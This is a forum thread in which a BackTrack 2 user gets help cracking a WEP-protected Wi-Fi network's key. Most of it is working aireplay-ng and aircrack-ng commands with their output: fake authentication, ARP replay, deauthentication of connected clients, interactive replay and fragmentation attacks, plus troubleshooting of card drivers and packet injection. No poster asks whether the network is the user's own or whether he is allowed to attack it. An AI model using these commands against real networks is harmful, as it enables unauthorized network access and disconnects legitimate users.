Thread: BackTrack Final Question

  1. #1 Just burned his ISO (Join Date: Mar 2007, Posts: 17)

    BackTrack Final Question

    When I type the command

    airodump-ng -w capture.ivs -c 11 eth2

    the capture screen shows up and the packet numbers go up, and then I run

    aireplay-ng --arpreplay -b 00:0F:3D:3B:E5:CA -h 00:118:AB:EA:B3 eth2

    right after I run

    aireplay-ng -e DEFAULT -a 00:0F:3D:3B:E5:CA -c 01:118:AB:EA:B3 --deauth 10 eth2

    The packets go up and

    BSSID 00:00:00:00:00:00
    PWR -1
    RXQ 0
    Beacons 1130
    #Data , 10
    #/s 0
    CH 11
    MB 54
    ENC wep

    The Beacons keep going up until they get to the right amount, and once I have the right amount I run

    aircrack-ng -f 4 -m 00:0F:3D:3B:E5:CA -n 128 capture.cap

    Opening capture.cap

    open failed: No such file or directory

    Is this something I am not setting up, or some part of the command I am missing? Or is it because I am running a Live CD of BackTrack 2 Final and it is not saving the captured packets into a file, which in turn are not being saved to my hard drive because I am running live and it is not writing to my hard drive?

    Thank You
    ram360

  2. #2 Junior Member (Join Date: Feb 2007, Posts: 73)

    Beacons are just the AP broadcasting itself to the world. They have nothing to do with aircrack. What you need to pay attention to is the DATA packets being sent. Also, when airodump saves packets to a file, it places an incrementing number at the end (e.g. capture-01.ivs).

  3. #3 Just burned his ISO (Join Date: Mar 2007, Posts: 17)

    Thank you man. Well, how do I get the Data to go up then? Because when I run the deauthentication attack the packets should jump up and start, but the Data stays at 0.

    What would the command be to do this?

    aireplay-ng -e DEFAULT -a 00:0F:3D:3B:E5:CA -c 00:118:AB:EA:B3 --deauth 10 eth2


    Or is this not the right command to get the Data to start coming in?

    aircrack-ng -f 4 -m 00:0F:3D:3B:E5:CA -n 128 capture-01.cap

    does work. Sweet, man, thank you.

    But now I need to get the DATA up, and I have to find out how to do this.

  4. #4 Junior Member (Join Date: Feb 2007, Posts: 73)

    #1 Make sure that you do a FakeAuth before anything. Everything that precedes will be useless unless you do a FakeAuth.

    aireplay-ng -1 6000 -o 1 -q 10 -e <SSID> -a <AP> -h <MAC> ath0

    While running airodump-ng start ARP replay attack in another console

    aireplay-ng -3 -b <AP> -h <MAC> ath0

    Then use a DeAuth attack on the AP. If there is a client connected, aireplay-ng will find an ARP request upon reconnect. This will prompt you to use that packet. Type 'y' and watch the DATA go crazy. Otherwise you may want to try using this tutorial. It works great for me.

    Tutorial: How to crack WEP with no clients
    http://www.aircrack-ng.org/doku.php?...ith_no_clients

    I find the Fragmentation attack to work wonders. If you do use this method, I suggest using:

    aireplay-ng -2 -b <AP> -h <MAC> -f 1 -m 68 -n 86 ath0

    to capture an appropriate packet to use for the Frag attack and even chopchop. Then use packetforge-ng as described in the tutorial.

  5. #5 Just burned his ISO (Join Date: Mar 2007, Posts: 17)

    #1 Make sure that you do a FakeAuth before anything. Everything that precedes will be useless unless you do a FakeAuth.

    aireplay-ng -1 6000 -o 1 -q 10 -e <SSID> -a <AP> -h <MAC> ath0
    Default: is this my Access Point and MAC?


    While running airodump-ng start ARP replay attack in another console

    aireplay-ng -3 -b <AP> -h <MAC>
    Is this my Access Point and MAC?


    Then use a DeAuth attack on the AP. If there is a client connected, aireplay-ng will find an ARP request upon reconnect. This will prompt you to use that packet. Type 'y' and watch the DATA go crazy. Otherwise you may want to try using this tutorial. It works great for me.

    The interface MAC (00:00:00:00:00:00) doesn't match the specified MAC (-h).
    ifconfig eth2 hw ether 00:00:00:00:00:00
    12:54:00 Sending Authentication Request
    12:54:02 Sending Authentication Request
    12:54:04 Sending Authentication Request
    12:54:06 Sending Authentication Request
    12:54:08 Sending Authentication Request
    12:54:10 Sending Authentication Request
    12:54:12 Sending Authentication Request
    12:54:14 Sending Authentication Request
    12:54:16 Sending Authentication Request
    12:54:18 Sending Authentication Request
    12:54:20 Sending Authentication Request
    12:54:22 Sending Authentication Request
    12:54:24 Sending Authentication Request
    12:54:26 Sending Authentication Request
    12:54:28 Sending Authentication Request
    12:54:30 Sending Authentication Request

    Attack was unsuccessful. Possible reasons:

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * Try to change the number of packets (-o option).
    * The driver hasn't been patched for injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * Injection is not supported AT ALL on HermesI,
    Centrino, ndiswrapper and a few others chipsets.
    * You're too far from the AP. Get closer, or lower
    the transmit rate (iwconfig <iface> rate 1M)


  6. #6 Junior Member (Join Date: Feb 2007, Posts: 73)

    **READ THE TUTORIAL LISTED ABOVE** If you have already... RE-READ IT!
    Everything is laid out real nicely for you. It explains everything that you need to know. As for your FAILED FakeAuth, some APs will not respond if they think that there is an INVALID MAC. Try using your real MAC first before anything, and make sure that you are properly injecting packets.

  7. #7 Just burned his ISO (Join Date: Mar 2007, Posts: 17)

    The error that I thought I was getting was not really an error, because this is what the command should be doing, but I really need to use a different one though:

    aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 eth2

    * -2 means interactive replay
    * -b 00:14:6C:7E:40:80 selects packets with the MAC of the access point we are interested in (Is this the MAC of a device that is on the network, which you would see in airodump at the bottom where it shows who is on the network... or do I have that all wrong?)
    * -d FF:FF:FF:FF:FF:FF selects packets with a broadcast destination. Is the SSID of the network what I want here?
    * -t 1 selects packets with the "To Distribution System" flag set on
    * eth2 is the wireless interface

  8. #8 Just burned his ISO (Join Date: Mar 2007, Posts: 17)

    I have a SENAO NL-2511CD card and I am using BackTrack 2 Final. I start kismet and get the information that I need, then I put the card in monitor mode and

    start airodump-ng -w capture -c 6 eth2, which starts to capture,

    then arpreplay -b (AP MAC) -h (Target machine connected to that AP) eth2

    The interface MAC (00:00:00:00:00:00) doesn't match the specified MAC (-h).
    ifconfig eth2 hw ether 00:00:00:00:00:00
    13:51:15 Sending Authentication Request
    13:51:17 Sending Authentication Request
    13:51:19 Sending Authentication Request
    13:51:21 Sending Authentication Request
    13:51:23 Sending Authentication Request
    13:51:25 Sending Authentication Request
    13:51:27 Sending Authentication Request

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * Try to change the number of packets (-o option).
    * The driver hasn't been patched for injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * Injection is not supported AT ALL on HermesI,
    Centrino, ndiswrapper and a few others chipsets.
    * You're too far from the AP. Get closer, or lower
    the transmit rate (iwconfig <iface> rate 1M).

    aireplay-ng -e BISSD -a (AP MAC) -c (target machine connected to that AP) --deauth 10 eth2

    I should be getting a jump in the DATA but I get nothing... Does anyone know why? I was reading through the FAQ on Aircrack-ng and found this:

    First step, make sure you aren't using the orinoco driver. If the interface name is wlan0, then the driver is HostAP or wlan-ng. However, if the interface name is eth0 or eth1, then the driver is orinoco and you must disable the driver (use cardctl ident to know your card identifier, then edit /etc/pcmcia/config, replace orinoco_cs with hostap_cs and restart cardmgr).

    I am using the Orinoco driver; what do I need to do to fix this problem? I see the steps, but is this really all I need to do, or do I need a peek driver or something? Also, I have a Prism2 chipset; do I need to flash it?

    Thank You For Your Time

    Ram

  9. #9 Junior Member (Join Date: Jan 2006, Posts: 34)

    00:00:00:00:00:00

    is not a valid MAC.

    Besides, why are you fakeauthing
    The interface MAC (00:00:00:00:00:00) doesn't match the specified MAC (-h).
    ifconfig eth2 hw ether 00:00:00:00:00:00
    13:51:15 Sending Authentication Request
    13:51:17 Sending Authentication Request
    13:51:19 Sending Authentication Request
    13:51:21 Sending Authentication Request
    13:51:23 Sending Authentication Request
    13:51:25 Sending Authentication Request
    13:51:27 Sending Authentication Request

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * Try to change the number of packets (-o option).
    * The driver hasn't been patched for injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * Injection is not supported AT ALL on HermesI,
    Centrino, ndiswrapper and a few others chipsets.
    * You're too far from the AP. Get closer, or lower
    the transmit rate (iwconfig <iface> rate 1M).
    when there is already a client connected?

    I advise you to go to the aircrack-ng site and read up a bit.

    Excellent stuff over there.

  10. #10 Just burned his ISO (Join Date: Mar 2007, Posts: 17)

    I know 00:00:00:00:00:00 is not really a MAC, but I thought I should disclose that information.

    "Besides why are you fakeauthing": is there something else I should be doing besides this? I am wasting my time...

    Is there another command I should be using?

    *Attack 0: Deauthentication
    *Attack 1: Fake authentication
    *Attack 2: Interactive packet replay
    *Attack 3: ARP request replay attack
    *Attack 4: KoreK chopchop attack
    *Attack 5: Fragmentation attack

    I am using option 1. Should I be using 2 (Interactive packet replay), which will allow me to repeatedly spam the router with data from live traffic passing to/from it? It usually has a better chance of spurring up traffic.
